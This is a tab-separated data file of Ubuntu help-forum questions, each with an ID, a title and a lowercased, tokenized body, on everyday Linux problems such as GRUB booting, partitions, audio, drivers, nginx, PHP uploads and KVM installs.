390747	how to add a 'ram usage ' icon on the panel in lxde	sp , i have a 'cpu usage ' icon on my panel in lxde in ubuntu but want o monitor my ram usage as my ram is only 512 mb
390751	want to burn ubuntu as a disk so that my laptop that lacks an os can run it from my external hard drive	my laptop currently does not have an os , i used to run ubuntu 10.10 back in the day , then converted to windows 7 , but recently had to wipe my hard drive and want to try out ubuntu 13.10 . i have tried downloading the zip from the ubuntu website , then extracting it to my external hard drive , but my laptop will not run ubuntu from that . how can i convert it into a format that a computer with no operating system will read it ? some sort of disk file type , perhaps ? help !
390757	does true multitouch not support wide finger ?	i am using 12.04 on a recently bought dell xps . the touchpad configuration used to work on my old computer seems to be not working . on my old laptop . it did n't support true multitouch . ( three finger tap is not recognised ) . i assumed when two fingers were used , an 'widefinger ' event would be outputed . so i set xinput set-prop -- format=32 `` synps/2 synaptics touchpad '' `` synaptics two-finger width '' 10 to emulate the twofinger event and i was able to do the two-finger scolling . it turned out to have another surprising benefit : i can use my thumb to emulate either two-finger scoll or single finger which moves the cursor , simply depending on how wide i let my thumb touch the pad . ( either using the tip or the entire toe ) . this is very useful when browsing the internet because my other fingers can reset on keyboard while let the thumb to all the jobs about scrolling and moving cursor . however , this feature does not works anymore on my new computer , which supports true multi-touch . ( it can distinguish two/ three / four fingers event ) . but i feel this wide-finger event is somehow disabled . even if i set the two finger width threshold to 1 . the thumb is always detected as one finger to the system . so , my question is : is the width-finger no longer supported with true multitouch pad ? or if there 's a way to let it tell the difference of how i am using the thumb ? thanks .
390758	does ubuntu automatically perform maintenance in the background ?	i know with windows , it likes to go nuts when you 're idling , and i was just wondering if there was any sort of similar maintenance tasks that i should be concerned about with ubuntu . i know you do n't have to worry about fragmentation with linux ( due to ext2/3 ) , and i was just wondering if there was anything other common maintenance tasks that would be pointless for ubuntu or linux in general .
390761	windows 7 does n't show in grub menu	i have dual boot with ubuntu and windows 7 . i needed to reinstall w7 and after that i reinstalled grub so that i could access both ubuntu and w7 . unfortunately my grub loader does n't show w7 . i tried update-grub , i also tried os_prober and then update-grub . i also tried boot-repair but non of them seem to work . here is my bootinfoscript output : http : //pastebin.com/qd8bx0jq if there 's anyone who is able to help i would really appreciate the help . thanks formaiko
390763	could n't fnd gui shutdown in ubuntu 13.10	i 'm a new user to ubuntu and installed 13.10.. now i could n't find gui shutdown option which was there at the right corner of it . after googling i can see people reporting shutdown issues.. can some one please help me to have the gui shutdown option and with this i could n't find the details option which was there early
390766	how to insert video element in my ubuntu application ?	i saw on some sites that you can insert videos with the video element by importing qt 4.7 and qtmultimediakit 1.1 . but i have an error by compiling the project ( it 's a tabbed touch ui project ) : ( file path ) /presentation1.qml:44 type backbuttontab unavailable ( file path ) /ui/backbuttontab.qml:4 module `` qt '' is not installed ( file path ) /ui/backbuttontab.qml:5 module `` qtmultimediakit '' is not installed ( file path ) /ui/backbuttontab.qml:4 module `` qt '' is not installed ( file path ) ui/backbuttontab.qml:5 module `` qtmultimediakit '' is not installed /usr/lib/x86_64-linux-gnu/qt5/bin/qmlscene exited with code 255 i thought about adding qt 4.7 and qtmultimediakit 1.1 in the .qmlproject but it does n't change anything the message tells me that i have to install qtmultimediakit and qt , but i do n't know how to do it . ( i 've got the same problem with 3d elements by importing qt3d 1.0 or qt.labs.threed 1.0 - > what 's the difference between qt3d 1.0 and qt.labs.threed 1.0 ? ) i 'm using qt creator 2.8.1 based on qt 5.0.2 ( gcc 4.7.3 , 64 bit ) built on sep 16 2013 at 12:02:18 on ubuntu 13.10 .
390769	resize my root partition in a remote virtual server	i only access the server via terminal and i ca n't use graphical tools such as gparted ! i need it because i want to create a new partition from a part of root about 768mb to create a swap partition . # df -h filesystem size used avail use % mounted on /dev/vda 20g 1.3g 18g 7 % / udev 10m 0 10m 0 % /dev tmpfs 199m 4.9m 194m 3 % /run tmpfs 100m 12k 100m 1 % /run/user tmpfs 5.0m 4.0k 5.0m 1 % /run/lock
390770	automate ubuntu 12.04 vm in kvm	i am trying to automate using virt-install + preseed , ubuntu12.04 vm 's with kvm . i need the vm 's to be hosted on specific lvm volumes i had created for each one . when i run the script i get : error a size must be specified for non-existent disks . this is my install.sh file . my # ! /bin/bash sudo virt-install \ -- name=test \ -- connect=qemu : ///system \ -- ram=1024 \ -- vcpus=2 \ -- os-variant=ubuntuprecise \ -- hvm \ -- virt-type=kvm \ -- network=bridge : br0 \ -- location=http : //mirrors.usc.edu/pub/linux/distributions/ubuntu/dists/precise /main/installer-amd64/ \ -- file=test.img \ -- graphics vnc , port=5901 , password=test , listen=0.0.0.0 , keymap=ja \ -- disk path=/dev/vg/testing , size=9.7 \ -- extra-args= '' auto=true priority=critical initrd=/install/initrd.gz preseed/file=preseed.cfg '' \ this is my preseed.cfg file ( most likely there will be errors in this file , even though debconf says its ok , but i cant get this far ) : d-i debian-installer/locale string en d-i console-keymaps-at/keymap select en d-i netcfg/get_nameservers string 8.8.8.8 d-i netcfg/get_ipaddress string 192.168.0.20 d-i netcfg/get_netmask string 255.255.255.0 d-i netcfg/get_gateway string 192.168.0.1 d-i netcfg/choose_interface select eth0 d-i netcfg/disable_dhcp boolean true d-i netcfg/dhcp_options select configure network manually d-i netcfg/confirm_static boolean true d-i netcfg/get_hostname string test d-i netcfg/get_hostname seen false d-i netcfg/get_domain string ymotongpoo.local d-i mirror/protocol string http d-i mirror/country string manual d-i mirror/http/hostname string archive.ubuntu.com d-i mirror/http/directory string /ubuntu d-i mirror/http/proxy string d-i clock-setup/utc boolean true d-i time/zone string europe/athens d-i clock-setup/ntp boolean true d-i partman-auto/disk string /dev/vda d-i partman-lvm/devide_remove_lvm boolean true d-i partman-md/device_remove_md boolean true d-i partman-auto/method string regular d-i partman-lvm/confirm boolean true d-i partman-auto-lvm/guided_size string max d-i partman-auto/choose_recipe select atomic d-i partman/default_filesystem string ext4 d-i partman/confirm_write_new_label boolean true d-i partman/choose_partition select finish d-i partman/confirm boolean true d-i partman/confirm_nooverwrite boolean true d-i passwd/root-login boolean false d-i passwd/user-fullname string bob d-i passwd/username string bob d-i passwd/user-password-crypted password $ 1 $ r00dfhrl $ 7zb6nzvumbrbt5pchdkjl . d-i user-setup/allow-password-weak boolean true tasksel tasksel/first multiselect standard d-i pkgsel/include string openssh-server d-i pkgsel/upgrade select safe-upgrade d-i pkgsel/language-packs multiselect en , ja d-i pkgsel/update-policy select none d-i pkgsel/updatedb boolean false popularity-contest popularity-contest/participate boolean false d-i grub-installer/only_debian boolean true d-i grub-installer/with_other_os boolean true d-i finish-install/reboot_in_progress note
390772	increasing ubuntu partition	i recently installed ubuntu on my samsung laptop . after installing i realized that i would need more space , so i plugged in my usb to boot from and went into gparted to increase the size from 50 gigs to 100 . after doing this i thought i was done so a few days ago while on ubuntu it said that i was running low on space so i checked gparted and it showed my partition as having 100 gigs but they were n't usable on my ubuntu . a red circle with a `` ! '' in it was next to the ubuntu partition , so i right clicked and pressed check . and after a few minutes of waiting an error came up , the error is below . i am very new to ubuntu and do n't really have any idea what i am doing , any help would be greatly appreciated . error message : gparted 0.16.1 -- enable-libparted-dmraid libparted 2.3 check and repair file system ( ext4 ) on /dev/sda7 00:00:09 ( error ) calibrate /dev/sda7 00:00:00 ( success ) path : /dev/sda7 start : 468992000 end : 862283775 size : 393291776 ( 187.54 gib ) check file system on /dev/sda7 for errors and ( if possible ) fix them 00:00:09 ( success ) e2fsck -f -y -v /dev/sda7 pass 1 : checking inodes , blocks , and sizes pass 2 : checking directory structure pass 3 : checking directory connectivity pass 4 : checking reference counts pass 5 : checking group summary information 235030 inodes used ( 7.51 % , out of 3129344 ) 108 non-contiguous files ( 0.0 % ) 295 non-contiguous directories ( 0.1 % ) # of inodes with ind/dind/tind blocks : 0/0/0 extent depth histogram : 187706/20 1745237 blocks used ( 13.96 % , out of 12499968 ) 0 bad blocks 1 large file 147809 regular files 22222 directories 57 character device files 25 block device files 0 fifos 8 links 64907 symbolic links ( 47213 fast symbolic links ) 1 socket -- -- -- -- -- -- 235029 files e2fsck 1.42.8 ( 20-jun-2013 ) ext2fs_check_if_mount : input/output error while determining whether /dev/sda7 is mounted . grow file system to fill the partition 00:00:00 ( error ) resize2fs /dev/sda7 resize2fs 1.42.8 ( 20-jun-2013 ) ext2fs_check_mount_point : input/output error while determining whether /dev/sda7 is mounted . ======================================== results of sudo fdisk -l warning : gpt ( guid partition table ) detected on '/dev/sda ' ! the util fdisk does n't support gpt . use gnu parted . disk /dev/sda : 500.1 gb , 500107862016 bytes 255 heads , 63 sectors/track , 60801 cylinders , total 976773168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x467fc636 device boot start end blocks id system /dev/sda1 1 976773167 488386583+ ee gpt partition 1 does not start on physical sector boundary . disk /dev/sdb : 8103 mb , 8103395328 bytes 256 heads , 21 sectors/track , 2944 cylinders , total 15826944 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0xc3072e18 device boot start end blocks id system /dev/sdb1 * 63 15826943 7913440+ c w95 fat32 ( lba )
390774	splash screen with refind on a macbook pro 8.1	i have installed ubuntu 13.10 on my macbook pro with refiind . the dual boot with os x works perfectly , ubuntu works perfectly too but the ubuntu splash screen never displays , only the text startup . did i miss something ? how can i see this splash screen again ? thanks for your answer .
390775	managing php versions on an lts	first of all , i wish to stay on ubuntu 12.04 lts . i know that upgrading my version is a possibility but i do n't want to do that . i know the dogma is to stick with your repos for your distribution , but what is the best course of action when you require a php version that is not offered ? since php can be kept fairly atomic , i know compiling from source is an option , and one that i feel is valid , but could also be hard to maintain . our deploys happen by redeploying a new ami , so i feel this could be a solution . i also know that running our own package repo is too ( would love to hear from anybody running one in their own devops environment ) , and to get any best practices info about running ones own package mirror . lastly , i know dotdeb is an option as well , but then i still am relying on someone else for my versioning , and including a third party mirror for a production seems like a bad idea for several reasons . thank you all in advance .
390777	install java on a wine in a linux terminal server	i have a windows terminal process ( which requires java ) . i need to run this in a linux terminal server ( it 's an amazon ec2 instance ) . i installed wine , but now i need to install java . when i try to run wine jre-7u45-windows-i586.exe it shows the following error : application tried to create a window , but no driver could be loaded . make sure that your x server is running and that $ display is set correctly . how can install java in wine without installing the xserver ?
390778	i 'm trying to decide how to install ubuntu	to install ubuntu 12 requires 4.5 gb space ? + a few more for programs . however if you use the windows installer to takes only 500 mb . where do the included programs go if you use windows installer ? thanks for help .
390781	no sound from headphones ubuntu 13.10 on imac	i have a fresh ubuntu on imac . i have managed to set up the sound from the native speakers , however , there is still no sound from the headphones . i have disabled automute in alsamixer , but this did n't help . does anyone know what to do in this case ?
390782	panel allows other windows to acquire space ( i.e . panel does n't reserve space )	i have a ubuntu studio 13.10 ( saucy ) on a lenovo ideapad y510p . whenever i login , the default 'top ' panel does not reserve space for itself ( it allows other windows to acquire the space below it ) . but , when i right click on the top panel and hit 'panel preferences ' ( not properties ) , it automatically reserves space for itself and any windows that are beneath it are placed below it . i do not know why this is happening . i 've tried clicking on options like 'lock panel ' etc . i do not want 'auto-hide ' panel feature either . i 'm not a novice but fairly new to ubuntu . i have always got my way around fedora , for last 6 years . any ideas / suggestions to help resolve this issue are thankfully welcome !
390787	how to display rss article page instead of summary in thunderbird ?	when reading rss feeds in thunderbird , the summaries of articles are displayed by default , like this one : i would like to load the page of the article instead . for the summary above , it would load this page : there seems to be a setting for it but it does n't work : how to display the original page of an article in thunderbird ?
390791	how to use multiple wireless adapters to route traffic based on target	i have multiple wireless adapters ( let 's call them wlan0 , wlan1 ) and i can connect to multiple networks ( let 's call them network0 , network1 ) at the same time . now , what i want to accomplish is , route certain traffic through network1 and the rest through network0 . namely , i usually work and stream music at the same time and i want to split those two activities to different networks . i 'm mobile and my work requires being online , and also have a static ip address . so i have a good , steady 3g connection device ( which is a wireless access point ) with a static ip address . since the data transfer is limited and expensive , i also want to carry around a usb wireless adapter ( wlan1 ) to connect to free wireless networks , through which i can stream my music ( generally spotify and some internet radios ) . i expect all my other `` formal '' network traffic to go through wlan0 . how do i accomplish this ?
390794	stuck in grub command line hell	i installed ubuntu , but when i boot i go straight to grub rescue command prompt ( gnu grub version 2.00-19ubuntu2.1 ) . i can get a grub boot interface by typing : set root= ( hd0,5 ) set prefix= ( hd0,5 ) /boot/grub insmod normal normal and i can then boot into either windows 8 or unbuntu . but i really do n't want to type that every time i reboot . for reference : i have a new 2013 asus q501l . it had window 8.0 preinstalled . i shrunk the windows partition , leaving the other windows partitions alone , including sda1 and recovery . i installed ubuntu on the space i created from the shrunken windows partition . i have tried the following to fix this : boot-recovery ( both legacy mode and efi mode as described here ( that is , i get the winefi detected message in boot repair , but i 've tried it both with and without activating the windows efi inside boot-repair ) . boot repair says , when finished with non-efi approach : please do not forget to make your bios boot on sda1/efi/ubuntustudio/shimx64.efi file ! . but in my bios , the only ubuntu boot option is `` ubuntu ( po : toshiba mq ... 75 ) . the instructions here for reassociating grub with the boot partition the instructions ( stuck on grub command line ) ( note , no rep so limited to 2 links ) for using the chroot method the instructions here to change the grub record timeout . in the grub command line i really am at a loss . here is the output from sudo fdisk -l : disk /dev/sda : 750.2 gb , 750156374016 bytes 255 heads , 63 sectors/track , 91201 cylinders , total 1465149168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x5b98f280 device boot start end blocks id system /dev/sda1 1 1465149167 732574583+ ee gpt partition 1 does not start on physical sector boundary . here is the result from df -th : filesystem type size used avail use % mounted on /dev/sda5 ext4 92g 6.2g 81g 8 % / none tmpfs 4.0k 0 4.0k 0 % /sys/fs/cgroup udev devtmpfs 2.8g 4.0k 2.8g 1 % /dev tmpfs tmpfs 567m 1.1m 566m 1 % /run none tmpfs 5.0m 0 5.0m 0 % /run/lock none tmpfs 2.8g 76k 2.8g 1 % /run/shm none tmpfs 100m 24k 100m 1 % /run/user finally , here is the link to my latest boot-repair attempt : http : //paste.ubuntu.com/6573706/ please help ! i do n't want to customize my ubuntu install until this is resolved , because i 'm not sure i wo n't have to wipe everything . thank you . update : i installed refind . it worked , but only if i boot from the default/generic variants . i still ca n't boot from the specific ubuntu versions that ubuntu tries to use , as those go straight to the grub command line .
390796	webcam shows blank gray screen	i have a problem with webcam on ubuntu 13.10 and thinkpad t410s integrated camera . webcam is detected , but video shows blank gray screen . i 've preloaded v4l1compat.so before loading apps but it does not affect anything . any suggestions ?
390797	can xfce put desktop icons on the right ?	is it possible to have xfce put all the desktop icons to the right instead of the left ? i hunted about in the settings and various place , but found no obvious setting .
390798	ca n't install open jdk ?	i 'm trying to install minecraft on ubuntu 12.04 lts . when i try to install open jdk it gives me this message : the following packages have unmet dependencies : openjdk-6-jre : depends : openjdk-6-jre-headless ( > = 6b24-1.11.1-4ubuntu2 ) but it is not installed depends : libjpeg8 ( > = 8c ) but 8c-2ubuntu7 is installed depends : libpulse0 ( > = 1:0.99.1 ) but 1:1.1-0ubuntu15.3 is installed help me ?
390799	are there some packages i need to install to run apps compiled with mono c # ?	i use monodevelop for writing and compiling c # code . i am wondering if there are some prerequisite packages to run built application ? also , output is always *.exe , does it need to be like that and can i remove .exe ? yeah , i know i am a noob so do n't be harsh . ty
390800	`` no data was received to import '' while using phpmyadmin and ispconfig	so , i have a pc with ubuntu 12 lts , apache-php-mysql package and ispconfig on it . today i 've tried to import an sql file witn phpmyadmin , and it gave me the following error : no data was received to import . either no file name was submitted , or the file size exceeded the maximum size permitted by your php configuration . and observed that two more errors appeared , the first one the phpmyadmin configuration storage is not completely configured and the second one the configuration file now needs a secret passphrase ( blowfish_secret ) i 've googled about 4-5 hours , found some solutions , but none of them worked for me . i 've tried to fix the blowfish_secret by inserting an $ cfg variable to phpma 's configuration file ( solution found on phpma 's official site ) but without success . somebody had the same or similar issue ?
390801	my server is making me download the code instead of running it	i am running an ubuntu server 12.04 but unfortunately i am not being able to make the interpreter run the code exactly . i am using nginx encrypted lvm and here is the conf.d ( main part ) : server { listen 80 default_server ; listen [ : : ] :80 default_server ipv6only=on ; root /website ; index index.php index.html index.htm ; # make site accessible from http : //localhost/ server_name localhost ; location / { # first attempt to serve request as file , then # as directory , then fall back to displaying a 404. try_files $ uri $ uri/ =404 ; # uncomment to enable naxsi on this location # include /etc/nginx/naxsi.rules } # location /doc/ { # alias /usr/share/doc/ ; # autoindex on ; # allow 127.0.0.1 ; # allow : :1 ; # deny all ; # } # only for nginx-naxsi used with nginx-naxsi-ui : process denied requests # location /requestdenied { # proxy_pass http : //127.0.0.1:8080 ; # } # error_page 404 /404.html ; # redirect server error pages to the static page /50x.html # # error_page 500 502 503 504 /50x.html ; # location = /50x.html { # root /usr/share/nginx/html ; # } # pass the php scripts to fastcgi server listening on 127.0.0.1:9000 # # location ~ \.php $ { # fastcgi_split_path_info ^ ( .+\.php ) ( /.+ ) $ ; # # note : you should have `` cgi.fix_pathinfo = 0 ; '' in php.ini # # # with php5-cgi alone : # fastcgi_pass 127.0.0.1:9000 ; # # with php5-fpm : # fastcgi_pass unix : /var/run/php5-fpm.sock ; # fastcgi_index index.php ; # include fastcgi_params ; # } # deny access to .htaccess files , if apache 's document root # concurs with nginx 's one # # location ~ /\.ht { # deny all ; # } } another thing i 'm quite in doubt is how exactly can i check what `` modules '' i have installed at the moment ? i want to run sqli , php and jquery for example but it gets really messy because i 'm always in doubt of what i have and have n't got installed and how i should procede to install what i need ...
390803	samsung printer ml-2545	i ca n't find a driver for my samsung ml-2545 monochrome printer that will work.i tried getting it from samsung but when i install it it says 'missing file /usr/lib/cups/filter/rastertosplc ' which is in my downloads folder but i ca n't get it into the /usr/lib/cups/filter/ folder . i am not good with terminal . any ideas ?
390805	clang error `` stddef.h file not found '' ?	after upgrading to saucy , clang now gives me the error message : clang -wall -werror -std=c99 -ggdb -o0 5.1.c -o 5.1 in file included from 5.1.c:1 : /usr/include/stdio.h:33:11 : fatal error : 'stddef.h ' file not found # include < stddef.h > ^ 1 error generated . make : *** [ 5.1 ] error 1 btw the header i included was stdio.h not stddef.h but i am assuming that stdio.h references or # includes stddef.h
390806	how can i redirect input from syslog	i installed ganglia and gmond spam the syslog in a way which makes it unreadable ( hundreds messages per second ) i wanted to redirect these messages to own log file by adding this to rsyslog config : : rawmsg , contains , '' gmond '' /var/log/gmond.log this made gmond.log and started filling it with gmond logs but it did n't stop them from being written to syslog file as well . how do i redirect , not duplicate , the messages ?
390807	rhythmbox updates failing	i am having trouble updating with rhythmbox . i 'm using ubuntu 13.10 i have purged it and did a new install and i keep getting an error message : when i attempt an upgrade : vividvibe @ vividvibe-p55m-ud2 : ~ $ sudo apt-get upgrade reading package lists ... done building dependency tree reading state information ... done the following packages will be upgraded : librhythmbox-core7 1 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . need to get 812 kb of archives . after this operation , 39.9 kb of additional disk space will be used . do you want to continue [ y/n ] ? y get:1 http : //ppa.launchpad.net/jacob/media/ubuntu/ saucy/main librhythmbox-core7 amd64 3.0.1-0~13.10~ppa1 [ 812 kb ] fetched 812 kb in 1s ( 578 kb/s ) ( reading database ... 259190 files and directories currently installed . ) preparing to replace librhythmbox-core7 2.99.1-0ubuntu1 ( using ... /librhythmbox-core7_3.0.1-0~13.10~ppa1_amd64.deb ) ... unpacking replacement librhythmbox-core7 ... dpkg : error processing /var/cache/apt/archives/librhythmbox-core7_3.0.1-0~13.10~ppa1_amd64.deb ( -- unpack ) : trying to overwrite '/usr/lib/librhythmbox-core.so.8.0.0 ' , which is also in package librhythmbox-core8 3.0.1-1ubuntu5~ppa0 dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) errors were encountered while processing : /var/cache/apt/archives/librhythmbox-core7_3.0.1-0~13.10~ppa1_amd64.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) not sure what the problem could be .
390809	how do i connect to an ibm mainframe ?	how do i connect to a x3270 ibm mainframe using the gnome terminal ? i am not sure how to do this . is there any documentation on it ?
390810	unable to boot ubuntu 13.04 dual boot windows 7	units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x03141627 device boot start end blocks id system /dev/sda1 * 2048 206847 102400 7 hpfs/ntfs/exfat /dev/sda2 206848 104859647 52326400 7 hpfs/ntfs/exfat /dev/sda3 104861694 208764927 51951617 5 extended partition 3 does not start on physical sector boundary . /dev/sda5 104861696 204859391 49998848 83 linux /dev/sda6 204861440 208764927 1951744 82 linux swap / solaris disk /dev/sdb : 8004 mb , 8004304896 bytes 255 heads , 63 sectors/track , 973 cylinders , total 15633408 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0xfdc01076 device boot start end blocks id system /dev/sdb1 * 63 15633407 7816672+ c w95 fat32 ( lba )
390811	ubuntu 12.10 iso i386 vs amd64	i have an intel system . but i get amd64 as the default download from the website . can someone clarify if the above file works for intel systems as well
390812	how to fix minecraft showing as a grey question mark on the launcher ?	when i play minecraft , the icon in the unity launcher for it is always a grey question mark . this has persisted from minecraft 1.6.2 to 1.7.4 . see this screenshot : how can this be fixed ? i have tried to create a .desktop file to launch the minecraft launcher , however this only gives the launcher an icon and the game still shows as a grey question mark . the .desktop file attempted was ( adapted from this asnwer ) : [ desktop entry ] name=minecraft test comment= exec=java -jar /opt/minecraft/minecraft_launcher.jar icon=/usr/share/icons/minecraft_block.svg terminal=false type=application startupnotify=true i 've also tried creating a file with gnome-desktop-item-edit -- create-new however that does n't work either . with either method , if i specify an icon in the .desktop file , the icon is given to the minecraft launcher , not the game ( i want the game to have an icon as well ) . i was using ubuntu 13.04 ; i 've since upgraded ( via a fresh install ) to 13.10 with the same issue persisting .
390813	can not update ubuntu	whenever i try to update through the update manager it fails and says package operation failed . the installation or removal of a software package failed . when i try : sudo mv /etc/dpkg/dpkg.cfg.d/multiarch /etc/dpkg/dpkg.cfg.d/multiarch.wrong results in `` no such file . '' the directory /etc/dpkg/dpkg.cfg.d is empty whenever i try to install adobe flash by selecting `` install missing plugins '' it says it fails .
390823	how do i get more than 16tb out of ext3 ?	i have an mdadm raid 6 array that i just added a 20th disk to . it consists of 20 1tb drives . raid detail : $ sudo mdadm -- detail /dev/md0 [ sudo ] password for : /dev/md0 : version : 00.90 creation time : fri feb 12 12:36:20 2010 raid level : raid6 array size : 17581676544 ( 16767.19 gib 18003.64 gb ) used dev size : 976759808 ( 931.51 gib 1000.20 gb ) raid devices : 20 total devices : 20 preferred minor : 0 persistence : superblock is persistent update time : sat dec 14 14:45:57 2013 state : clean active devices : 20 working devices : 20 failed devices : 0 spare devices : 0 chunk size : 512k kernel $ uname -r 2.6.32-48-generic the error i am running into : $ sudo resize2fs /dev/md0 resize2fs 1.41.11 ( 14-mar-2010 ) resize2fs : file too large while trying to determine filesystem size i am rapidly getting close to running out of room : $ df /dev/md0 16344351220 16277117492 67233728 100 % /media how do i get past the 16tb threshold ? i do not have anything large enough to back up the data to at this point , nor is it financially feasible to do at this point . it was never anticipated that it would have got this large in the beginning . thanks
390826	'unable to locate package . ' when installing linux-headers	i 'm trying to make a wifi driver work and the instructions say to paste the code one line at a time . does this mean hit enter after each line ? how do i move down a line ? when i paste the first line and hit enter , i get : unable to locate package . i am trying to enter four lines of text to make the code work : sudo apt-get install build-essential linux-headers-`uname -r` cd downloads/rtl8187l_linux_1041.0209.2012 make sudo make install
390829	ca n't install ubuntu by usb or from windows	i downloaded ubuntu 12.04 lts from official website and then made it to usb by universal usb installer . then i restarted laptop and chose `` start from usb '' , but nothing happened except a black screen with a short dash line in the left top corner.. i also tried to install from windows by wubi . after installation and reboot by choosing ubuntu , it showed `` normal booting '' ( something like that i ca n't remember ) . then it stopped there and could n't continue.. now i use win 7 ultimate , memory is 4gb and processor is intel core 2 duo t6400 @ 2ghz really appreciate for your help ...
390833	chsh does not appear to stick	i 'm trying to change my default shell to zsh . zsh exists , and works when i straight up call zsh . however , this is what happens when i try to switch it : mike @ mike-desktop : ~ $ echo $ shell /bin/bash mike @ mike-desktop : ~ $ which zsh /usr/bin/zsh mike @ mike-desktop : ~ $ chsh -s $ ( which zsh ) password : mike @ mike-desktop : ~ $ echo $ shell /bin/bash restarting terminal shows bash as being the main shell . any ideas ? i 've tried running it with sudo , same results .
390834	error installing repo command . help please ? ! ! ubuntu 12.04 lts	i 'm trying to install the repo command so i can compile cyanogenmod for my phone but whenever i enter the command : curl http : //commondatastorage.googleapis.com/git-repo-downloads/repo > ~/bin/repo i get an error saying : bash : /home/r0b458/bin/repo : permission denied can anybody help me out here ?
390835	sound from headphones but not from speakers in alienware 14	i just installed ubuntu 13.10 in my alienware 14 ( july-2013 ) laptop . apparently there is no sound from speakers , however when i connect headphones sound is perfect through them . i 've tried to purge-remove-reinstall alsa drivers and pulseaudio , and still no sound . i even tried some solution i found through this site related to adding the following : options snd-hda-intel model=alienware to /etc/modprobe.d/alsa-base.conf ( i also tried with generic , intel , dell and ref ) and no luck whatsoever . i also tried updating to the latest kernel ( 3.12 ) and still without sound coming out from the speakers . volume controls are all un-muted , i checked it as well . any suggestion ? this is the output for the command aplay -l card 0 : mid [ hda intel mid ] , device 3 : hdmi 0 [ hdmi 0 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 0 : mid [ hda intel mid ] , device 7 : hdmi 1 [ hdmi 1 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 0 : mid [ hda intel mid ] , device 8 : hdmi 2 [ hdmi 2 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 1 : pch [ hda intel pch ] , device 0 : alc668 analog [ alc668 analog ] subdevices : 0/1 subdevice # 0 : subdevice # 0
390836	ubuntu disabling bluetooth in windows 7	i got my new laptop , and since i 'm a bit `` bu-curious '' , i installed ubuntu using wubi , alongside my windows 7 copy ( on an fujitsu uh572 ( intel ) laptop ) . i use bluetooth to connect to my speakers , and it all worked fine in ubuntu . restarting into windows , however , meant that bluetooth no longer works.. reading up on the issue , it seems when disabling bt in ubuntu , win has a hard time understanding the hardware after restart . i have tried : installed pulsesound ( bluetooth doesnt even show as an option ) rebooting uninstalling/reinstalling bluetooth ( atheros ) drivers in windows - after reinstalling it still only says `` generic bt driver '' so do n't think it was too successful . still not working - i can see my speakers but not connect to them . some guides say that i should unplug and pull out battery to let the bluetooth hardware somehow `` reset '' . the battery is not detachable ( behind screws ) and i would rather solve this some other way if possible before trying something like that . using ubuntu as some sort of sandbox to learn linux while still having windows seems to have failed , now there 's sand in my win7 ... someone know what to do , is there any point going into bios and mess about ? for lack of imagination , that 's what i 'll try now..
390841	do cannonical accepts btc/bitcoins as donations ?	i was wondering if there is a way to donate with bitcoin ? i would love to donate , but the only funds available to me now is bitcoin .
390842	how do i save an uploaded file in php ?	in php , i 'm trying to save a file to the /var/www/upload directory , but whatever i try , it does n't work . i 've tried giving www-data ownership of /var/www and subdirectories . i 've tried modifying the code , to no avail . ( running ubuntu server 13.10 ) here 's my code : ( i 'm trying to upload a png file . ) < ? php $ allowedexts = array ( `` gif '' , `` jpeg '' , `` jpg '' , `` png '' ) ; $ temp = explode ( `` . `` , $ _files [ `` file '' ] [ `` name '' ] ) ; $ extension = end ( $ temp ) ; if ( ( ( $ _files [ `` file '' ] [ `` type '' ] == `` image/gif '' ) || ( $ _files [ `` file '' ] [ `` type '' ] == `` image/jpeg '' ) || ( $ _files [ `` file '' ] [ `` type '' ] == `` image/jpg '' ) || ( $ _files [ `` file '' ] [ `` type '' ] == `` image/pjpeg '' ) || ( $ _files [ `` file '' ] [ `` type '' ] == `` image/x-png '' ) || ( $ _files [ `` file '' ] [ `` type '' ] == `` image/png '' ) ) & & ( $ _files [ `` file '' ] [ `` size '' ] < 20000 ) & & in_array ( $ extension , $ allowedexts ) ) { if ( $ _files [ `` file '' ] [ `` error '' ] > 0 ) { echo `` return code : `` . $ _files [ `` file '' ] [ `` error '' ] . `` < br > '' ; } else { echo `` upload : `` . $ _files [ `` file '' ] [ `` name '' ] . `` < br > '' ; echo `` type : `` . $ _files [ `` file '' ] [ `` type '' ] . `` < br > '' ; echo `` size : `` . ( $ _files [ `` file '' ] [ `` size '' ] / 1024 ) . `` kb < br > '' ; echo `` temp file : `` . $ _files [ `` file '' ] [ `` tmp_name '' ] . `` < br > '' ; if ( file_exists ( `` upload/ '' . $ _files [ `` file '' ] [ `` name '' ] ) ) { echo $ _files [ `` file '' ] [ `` name '' ] . `` already exists . `` ; } else { $ hey = move_uploaded_file ( $ _files [ `` file '' ] [ `` tmp_name '' ] , `` upload/ '' . $ _files [ `` file '' ] [ `` name '' ] ) ; echo `` stored in : `` . `` upload/ '' . $ _files [ `` file '' ] [ `` name '' ] ; echo `` \n '' . $ hey ; } } } else { echo `` invalid file '' ; } ? > any help appreciated .
390843	disable middle mouse click paste in kate	followed this ( wonderful ! ) guide to disable middle mouse click paste : https : //www.assembla.com/spaces/slipstream/wiki/disabling_gtk % 27s_middle_mouse_button_functionality works like a charm . well , except for kate . my middle mouse button is very sensitive , and very often i paste code where it does n't belong without even noticing . any ideas why and how to fix it ( did n't find anything in kate 's settings ) ? edit : the patch published by jelle geerts : how do i disable middle mouse button click paste ?
390845	when will ubuntu mobile os be available for lg g2 ?	i really would like ubuntu for both my phone and computer due to many advantages it seems to give , but the ubuntu mobile os has n't been officially released for my lg g2 . i 'm also paranoid of downloading a simple ported os of it . when should i expect the os to be available for my phone ?
